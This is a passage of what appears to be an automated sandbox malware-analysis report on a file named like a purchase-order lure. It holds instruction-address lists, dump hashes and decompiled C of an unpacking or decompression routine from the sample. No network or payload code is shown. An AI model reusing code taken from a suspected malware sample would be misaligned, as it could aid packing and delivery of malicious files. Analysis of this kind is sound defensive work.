                                                                                                                          0x004067d7
                                                                                                                          0x004067db
                                                                                                                          0x00406b79
                                                                                                                          0x00000000
                                                                                                                          0x00406b79
                                                                                                                          0x004067e1
                                                                                                                          0x004067e4
                                                                                                                          0x004067e7
                                                                                                                          0x004067eb
                                                                                                                          0x004067ee
                                                                                                                          0x004067f4
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f6
                                                                                                                          0x004067f9
                                                                                                                          0x004067fc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063cc
                                                                                                                          0x004063cc
                                                                                                                          0x004063d0
                                                                                                                          0x00406b3d
                                                                                                                          0x00000000
                                                                                                                          0x00406b3d
                                                                                                                          0x004063d6
                                                                                                                          0x004063d9
                                                                                                                          0x004063dc
                                                                                                                          0x004063e0
                                                                                                                          0x004063e3
                                                                                                                          0x004063e9
                                                                                                                          0x004063eb
                                                                                                                          0x004063eb
                                                                                                                          0x004063eb
                                                                                                                          0x004063ee
                                                                                                                          0x004063f1
                                                                                                                          0x004063f1
                                                                                                                          0x004063f4
                                                                                                                          0x004063f7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004063fd
                                                                                                                          0x00406403
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406409
                                                                                                                          0x00406409
                                                                                                                          0x0040640d
                                                                                                                          0x00406410
                                                                                                                          0x00406413
                                                                                                                          0x00406416
                                                                                                                          0x00406419
                                                                                                                          0x0040641a
                                                                                                                          0x0040641d
                                                                                                                          0x0040641f
                                                                                                                          0x00406425
                                                                                                                          0x00406428
                                                                                                                          0x0040642b
                                                                                                                          0x0040642e
                                                                                                                          0x00406431
                                                                                                                          0x00406434
                                                                                                                          0x00406437
                                                                                                                          0x00406453
                                                                                                                          0x00406456
                                                                                                                          0x00406459
                                                                                                                          0x0040645c
                                                                                                                          0x00406463
                                                                                                                          0x00406467
                                                                                                                          0x00406469
                                                                                                                          0x0040646d
                                                                                                                          0x00406439
                                                                                                                          0x00406439
                                                                                                                          0x0040643d
                                                                                                                          0x00406445
                                                                                                                          0x0040644a
                                                                                                                          0x0040644c
                                                                                                                          0x0040644e
                                                                                                                          0x0040644e
                                                                                                                          0x00406470
                                                                                                                          0x00406477
                                                                                                                          0x0040647a
                                                                                                                          0x00000000
                                                                                                                          0x00406480
                                                                                                                          0x00000000
                                                                                                                          0x00406480
                                                                                                                          0x00000000
                                                                                                                          0x00406485
                                                                                                                          0x00406485
                                                                                                                          0x00406489
                                                                                                                          0x00406b49
                                                                                                                          0x00000000
                                                                                                                          0x00406b49
                                                                                                                          0x0040648f
                                                                                                                          0x00406492
                                                                                                                          0x00406495
                                                                                                                          0x00406499
                                                                                                                          0x0040649c
                                                                                                                          0x004064a2
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a4
                                                                                                                          0x004064a7
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064aa
                                                                                                                          0x004064b0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004064b2
                                                                                                                          0x004064b5
                                                                                                                          0x004064b8
                                                                                                                          0x004064bb
                                                                                                                          0x004064be
                                                                                                                          0x004064c1
                                                                                                                          0x004064c4
                                                                                                                          0x004064c7
                                                                                                                          0x004064ca
                                                                                                                          0x004064cd
                                                                                                                          0x004064d0
                                                                                                                          0x004064e8
                                                                                                                          0x004064eb
                                                                                                                          0x004064ee
                                                                                                                          0x004064f1
                                                                                                                          0x004064f1
                                                                                                                          0x004064f4
                                                                                                                          0x004064f8
                                                                                                                          0x004064fa
                                                                                                                          0x004064d2
                                                                                                                          0x004064d2
                                                                                                                          0x004064da
                                                                                                                          0x004064df
                                                                                                                          0x004064e1
                                                                                                                          0x004064e3
                                                                                                                          0x004064e3
                                                                                                                          0x004064fd
                                                                                                                          0x00406504
                                                                                                                          0x00406507
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00000000
                                                                                                                          0x00406509
                                                                                                                          0x00406507
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x0040650e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406549
                                                                                                                          0x00406549
                                                                                                                          0x0040654d
                                                                                                                          0x00406b55
                                                                                                                          0x00000000
                                                                                                                          0x00406b55
                                                                                                                          0x00406553
                                                                                                                          0x00406556
                                                                                                                          0x00406559
                                                                                                                          0x0040655d
                                                                                                                          0x00406560
                                                                                                                          0x00406566
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x00406568
                                                                                                                          0x0040656b
                                                                                                                          0x0040656e
                                                                                                                          0x0040656e
                                                                                                                          0x00406574
                                                                                                                          0x00406512
                                                                                                                          0x00406512
                                                                                                                          0x00406515
                                                                                                                          0x00000000
                                                                                                                          0x00406515
                                                                                                                          0x00406576
                                                                                                                          0x00406576
                                                                                                                          0x00406579
                                                                                                                          0x0040657c
                                                                                                                          0x0040657f
                                                                                                                          0x00406582
                                                                                                                          0x00406585
                                                                                                                          0x00406588
                                                                                                                          0x0040658b
                                                                                                                          0x0040658e
                                                                                                                          0x00406591
                                                                                                                          0x00406594
                                                                                                                          0x004065ac
                                                                                                                          0x004065af
                                                                                                                          0x004065b2
                                                                                                                          0x004065b5
                                                                                                                          0x004065b5
                                                                                                                          0x004065b8
                                                                                                                          0x004065bc
                                                                                                                          0x004065be
                                                                                                                          0x00406596
                                                                                                                          0x00406596
                                                                                                                          0x0040659e
                                                                                                                          0x004065a3
                                                                                                                          0x004065a5
                                                                                                                          0x004065a7
                                                                                                                          0x004065a7
                                                                                                                          0x004065c1
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x004065cd
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x0040685e
                                                                                                                          0x00406b85
                                                                                                                          0x00000000
                                                                                                                          0x00406b85
                                                                                                                          0x00406864
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00406877
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x00406879
                                                                                                                          0x0040687c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040662a
                                                                                                                          0x0040662a
                                                                                                                          0x0040662d
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x00406969
                                                                                                                          0x0040696d
                                                                                                                          0x0040698f
                                                                                                                          0x00406992
                                                                                                                          0x0040699c
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x0040699f
                                                                                                                          0x0040699f
                                                                                                                          0x0040696f
                                                                                                                          0x00406972
                                                                                                                          0x00406976
                                                                                                                          0x00406979
                                                                                                                          0x00406979
                                                                                                                          0x0040697c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a26
                                                                                                                          0x00406a2a
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a48
                                                                                                                          0x00406a4f
                                                                                                                          0x00406a56
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a5d
                                                                                                                          0x00000000
                                                                                                                          0x00406a5d
                                                                                                                          0x00406a2c
                                                                                                                          0x00406a2f
                                                                                                                          0x00406a32
                                                                                                                          0x00406a35
                                                                                                                          0x00406a3c
                                                                                                                          0x00406980
                                                                                                                          0x00406980
                                                                                                                          0x00406983
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406b17
                                                                                                                          0x00406b1a
                                                                                                                          0x00406a1b
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406751
                                                                                                                          0x00406753
                                                                                                                          0x0040675a
                                                                                                                          0x0040675b
                                                                                                                          0x0040675d
                                                                                                                          0x00406760
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406768
                                                                                                                          0x0040676b
                                                                                                                          0x0040676e
                                                                                                                          0x00406770
                                                                                                                          0x00406772
                                                                                                                          0x00406772
                                                                                                                          0x00406773
                                                                                                                          0x00406776
                                                                                                                          0x0040677d
                                                                                                                          0x00406780
                                                                                                                          0x0040678e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a64
                                                                                                                          0x00406a64
                                                                                                                          0x00406a67
                                                                                                                          0x00406a6e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406a73
                                                                                                                          0x00406a73
                                                                                                                          0x00406a77
                                                                                                                          0x00406baf
                                                                                                                          0x00000000
                                                                                                                          0x00406baf
                                                                                                                          0x00406a7d
                                                                                                                          0x00406a80
                                                                                                                          0x00406a83
                                                                                                                          0x00406a87
                                                                                                                          0x00406a8a
                                                                                                                          0x00406a90
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a92
                                                                                                                          0x00406a95
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a98
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9b
                                                                                                                          0x00406a9f
                                                                                                                          0x00406aff
                                                                                                                          0x00406b02
                                                                                                                          0x00406b07
                                                                                                                          0x00406b08
                                                                                                                          0x00406b0a
                                                                                                                          0x00406b0c
                                                                                                                          0x00406b0f
                                                                                                                          0x00406a1b
                                                                                                                          0x00406a1b
                                                                                                                          0x00000000
                                                                                                                          0x00406a21
                                                                                                                          0x00406a1b
                                                                                                                          0x00406aa1
                                                                                                                          0x00406aa7
                                                                                                                          0x00406aaa
                                                                                                                          0x00406aad
                                                                                                                          0x00406ab0
                                                                                                                          0x00406ab3
                                                                                                                          0x00406ab6
                                                                                                                          0x00406ab9
                                                                                                                          0x00406abc
                                                                                                                          0x00406abf
                                                                                                                          0x00406ac2
                                                                                                                          0x00406adb
                                                                                                                          0x00406ade
                                                                                                                          0x00406ae1
                                                                                                                          0x00406ae4
                                                                                                                          0x00406ae8
                                                                                                                          0x00406aea
                                                                                                                          0x00406aea
                                                                                                                          0x00406aeb
                                                                                                                          0x00406aee
                                                                                                                          0x00406ac4
                                                                                                                          0x00406ac4
                                                                                                                          0x00406acc
                                                                                                                          0x00406ad1
                                                                                                                          0x00406ad3
                                                                                                                          0x00406ad6
                                                                                                                          0x00406ad6
                                                                                                                          0x00406af1
                                                                                                                          0x00406af8
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406afa
                                                                                                                          0x00000000
                                                                                                                          0x00406796
                                                                                                                          0x00406799
                                                                                                                          0x004067cf
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x004068ff
                                                                                                                          0x00406902
                                                                                                                          0x00406902
                                                                                                                          0x00406905
                                                                                                                          0x00406907
                                                                                                                          0x00406b91
                                                                                                                          0x00000000
                                                                                                                          0x00406b91
                                                                                                                          0x0040690d
                                                                                                                          0x00406910
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406916
                                                                                                                          0x0040691a
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x0040691d
                                                                                                                          0x00000000
                                                                                                                          0x0040691d
                                                                                                                          0x0040679b
                                                                                                                          0x0040679d
                                                                                                                          0x0040679f
                                                                                                                          0x004067a1
                                                                                                                          0x004067a4
                                                                                                                          0x004067a5
                                                                                                                          0x004067a7
                                                                                                                          0x004067a9
                                                                                                                          0x004067ac
                                                                                                                          0x004067af
                                                                                                                          0x004067c5
                                                                                                                          0x004067ca
                                                                                                                          0x00406802
                                                                                                                          0x00406802
                                                                                                                          0x00406806
                                                                                                                          0x00406832
                                                                                                                          0x00406834
                                                                                                                          0x0040683b
                                                                                                                          0x0040683e
                                                                                                                          0x00406841
                                                                                                                          0x00406841
                                                                                                                          0x00406846
                                                                                                                          0x00406846
                                                                                                                          0x00406848
                                                                                                                          0x0040684b
                                                                                                                          0x00406852
                                                                                                                          0x00406855
                                                                                                                          0x00406882
                                                                                                                          0x00406882
                                                                                                                          0x00406885
                                                                                                                          0x00406888
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x004068fc
                                                                                                                          0x00000000
                                                                                                                          0x004068fc
                                                                                                                          0x0040688a
                                                                                                                          0x00406890
                                                                                                                          0x00406893
                                                                                                                          0x00406896
                                                                                                                          0x00406899
                                                                                                                          0x0040689c
                                                                                                                          0x0040689f
                                                                                                                          0x004068a2
                                                                                                                          0x004068a5
                                                                                                                          0x004068a8
                                                                                                                          0x004068ab
                                                                                                                          0x004068c4
                                                                                                                          0x004068c6
                                                                                                                          0x004068c9
                                                                                                                          0x004068ca
                                                                                                                          0x004068cd
                                                                                                                          0x004068cf
                                                                                                                          0x004068d2
                                                                                                                          0x004068d4
                                                                                                                          0x004068d6
                                                                                                                          0x004068d9
                                                                                                                          0x004068db
                                                                                                                          0x004068de
                                                                                                                          0x004068e2
                                                                                                                          0x004068e4
                                                                                                                          0x004068e4
                                                                                                                          0x004068e5
                                                                                                                          0x004068e8
                                                                                                                          0x004068eb
                                                                                                                          0x004068ad
                                                                                                                          0x004068ad
                                                                                                                          0x004068b5
                                                                                                                          0x004068ba
                                                                                                                          0x004068bc
                                                                                                                          0x004068bf
                                                                                                                          0x004068bf
                                                                                                                          0x004068ee
                                                                                                                          0x004068f5
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x0040687f
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x00000000
                                                                                                                          0x004068f7
                                                                                                                          0x004068f5
                                                                                                                          0x00406808
                                                                                                                          0x0040680b
                                                                                                                          0x0040680d
                                                                                                                          0x00406810
                                                                                                                          0x00406813
                                                                                                                          0x00406816
                                                                                                                          0x00406818
                                                                                                                          0x0040681b
                                                                                                                          0x0040681e
                                                                                                                          0x0040681e
                                                                                                                          0x00406821
                                                                                                                          0x00406821
                                                                                                                          0x00406824
                                                                                                                          0x0040682b
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x004067ff
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x00000000
                                                                                                                          0x0040682d
                                                                                                                          0x0040682b
                                                                                                                          0x004067b1
                                                                                                                          0x004067b4
                                                                                                                          0x004067b6
                                                                                                                          0x004067b9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406518
                                                                                                                          0x00406518
                                                                                                                          0x0040651c
                                                                                                                          0x00406b61
                                                                                                                          0x00000000
                                                                                                                          0x00406b61
                                                                                                                          0x00406522
                                                                                                                          0x00406525
                                                                                                                          0x00406528
                                                                                                                          0x0040652b
                                                                                                                          0x0040652e
                                                                                                                          0x00406531
                                                                                                                          0x00406534
                                                                                                                          0x00406536
                                                                                                                          0x00406539
                                                                                                                          0x0040653c
                                                                                                                          0x0040653f
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00406541
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004066a3
                                                                                                                          0x004066a3
                                                                                                                          0x004066a7
                                                                                                                          0x00406b6d
                                                                                                                          0x00000000
                                                                                                                          0x00406b6d
                                                                                                                          0x004066ad
                                                                                                                          0x004066b0
                                                                                                                          0x004066b3
                                                                                                                          0x004066b6
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066b8
                                                                                                                          0x004066bb
                                                                                                                          0x004066be
                                                                                                                          0x004066c1
                                                                                                                          0x004066c4
                                                                                                                          0x004066c7
                                                                                                                          0x004066ca
                                                                                                                          0x004066cb
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066cd
                                                                                                                          0x004066d0
                                                                                                                          0x004066d3
                                                                                                                          0x004066d6
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066d9
                                                                                                                          0x004066dc
                                                                                                                          0x004066de
                                                                                                                          0x004066de
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406920
                                                                                                                          0x00406924
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040692a
                                                                                                                          0x0040692d
                                                                                                                          0x00406930
                                                                                                                          0x00406933
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406935
                                                                                                                          0x00406938
                                                                                                                          0x0040693b
                                                                                                                          0x0040693e
                                                                                                                          0x00406941
                                                                                                                          0x00406944
                                                                                                                          0x00406947
                                                                                                                          0x00406948
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694a
                                                                                                                          0x0040694d
                                                                                                                          0x00406950
                                                                                                                          0x00406953
                                                                                                                          0x00406956
                                                                                                                          0x00406959
                                                                                                                          0x0040695d
                                                                                                                          0x0040695f
                                                                                                                          0x00406962
                                                                                                                          0x00000000
                                                                                                                          0x00406964
                                                                                                                          0x004066e1
                                                                                                                          0x004066e1
                                                                                                                          0x00000000
                                                                                                                          0x004066e1
                                                                                                                          0x00406962
                                                                                                                          0x00406b97
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004061c6
                                                                                                                          0x00406bce
                                                                                                                          0x00406bce
                                                                                                                          0x00000000
                                                                                                                          0x00406bce
                                                                                                                          0x00406a1b
                                                                                                                          0x004069a2
                                                                                                                          0x0040699f
                                                                                                                          0x00000000
                                                                                                                          0x004065d6

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                                                                                                                          • Instruction ID: 1046eeffc13e12efe39df9970ac10e2b765b46b26c22898380a8ab994a27db31
                                                                                                                          • Opcode Fuzzy Hash: 8f445da75e9a74604d226408adfd8c7b2685a98931b912d90ec5833448e5fd83
                                                                                                                          • Instruction Fuzzy Hash: 307124B1D00228CBDF24CF98C8447ADBBF1FB44305F15816AD856BB281D778AA96DF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004066F0 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004066F0() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406BD6))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
